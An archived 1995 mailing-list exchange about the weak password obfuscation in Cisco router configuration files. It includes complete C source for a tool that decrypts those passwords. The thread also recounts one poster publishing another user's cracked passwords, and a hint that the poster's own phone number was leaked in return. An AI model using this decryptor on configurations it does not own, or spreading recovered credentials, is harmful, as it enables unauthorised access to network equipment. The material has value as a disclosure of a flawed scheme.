insecurity

[George Francis McBay]

>From sny...@cisco.com Mon Mar 13 16:34:46 1995
>To: g...@gnu.ai.mit.edu (George Francis McBay)
>Subject: Re: Dropping packets on a 4k
>In-reply-to: Your message of "12 Mar 95 22:23:44 GMT."
> <3jvs9g$5...@life.ai.mit.edu>
>Date: Mon, 13 Mar 95 13:33:02 PST
>From: Robert Snyder <sny...@cisco.com>

>You think you just did this guy a favor by posting his passowrds to a
>public mailing list?

No, I probably did not do this particular guy a favor. I think I
did all the other guys (and females!) on this group a favor though. Do
not post your passwords here, even if they are encrypted. The encryption
system used for the configuration files is completely insecure, you don't
even need to brute-force the passwords, you can crack them in 'real-time'.
It uses a simple XOR system with a lousy 16-choice (00...15) random seed.
Anyone with a couple of free hours and an intermediate understanding of logic
theory could crack it, just given plaintext/encrypted passwords pairs, and
having no knowledge of the algorithm and no source code.
In fact, that's what we did.

>Can you tell me where you got the routine to decrypt passwords?

We reversed the algorithm and wrote our own routine, here it is:

---- w00 w00 ----

/* Cisco configuration file password hacker.
* Algorithm discovered, and program written by:
* gls and gfm[@gnu.ai.mit.edu]
*/

#include <stdio.h>
#include <string.h>

void main(void)
{
char password[32], cbyte[3], *cpt, text[12];
int seed, len, x, hex, count = 0;
int xor_table[] = { 0x64, 0x73, 0x66, 0x64,
0x3b, 0x6b, 0x66, 0x6f,
0x41, 0x2c, 0x2e, 0x69,
0x79, 0x65, 0x77, 0x72,
0x6b, 0x6c, 0x64, 0x4a,
0x4b, 0x44, 0x48, 0x53,
0x55, 0x42 };

printf("Encrypted password: ");
fflush(stdin);
fgets(password, 25, stdin);

if((cpt = strchr(password, '\n')) != NULL)
*cpt = '\0';

len = (strlen(password)/2) - 1;
sscanf(password, "%2d", &seed);

printf("Decrypting: %s [Length: %d Seed: %02d]\n", password, len, seed);

cbyte[2] = '\0';

for(x = 2; password[x]; x += 2)
{
cbyte[0] = password[x];
cbyte[1] = password[x + 1];

sscanf(cbyte, "%x" , &hex);
text[count++] = hex;
}

printf("Plaintext password: ");

for(count = 0; count < len; count++)
{
printf("%c", text[count] ^ xor_table[count + seed]);
}

printf("\n");
}

--- w00 w00 ---

>thanks
>Robert
>cisco eng

Thanks for asking.

[Robert Snyder]

> No, I probably did not do this particular guy a favor. I think I
> did all the other guys (and females!) on this group a favor though. Do
> not post your passwords here, even if they are encrypted.

I dont object to that and pointing out that posting encrypted is not a
good idea, most people are aware that posting their etc/passwd file
will open there site to attack, so the method of the encryption is not
the only problem one faces.

But placing his plain text passwords on a public mail list is a poorly
thought out idea.

Now by way of example, by now you have gotten a private message with
your home phone number enclosed. This is something that you have not
protected to the public, but as anyone on alt.2600 could tell you,
maybe you should.

Sorry, I am annoyed at your anti-social behavior.

BTW George is correct, though.
Service encryption is meant to obscure your password, in case you must
look at your config file in the pressence of others, but you should
really treat it like it is a plain text password.

Robert

******* Not representing cisco with this one. ********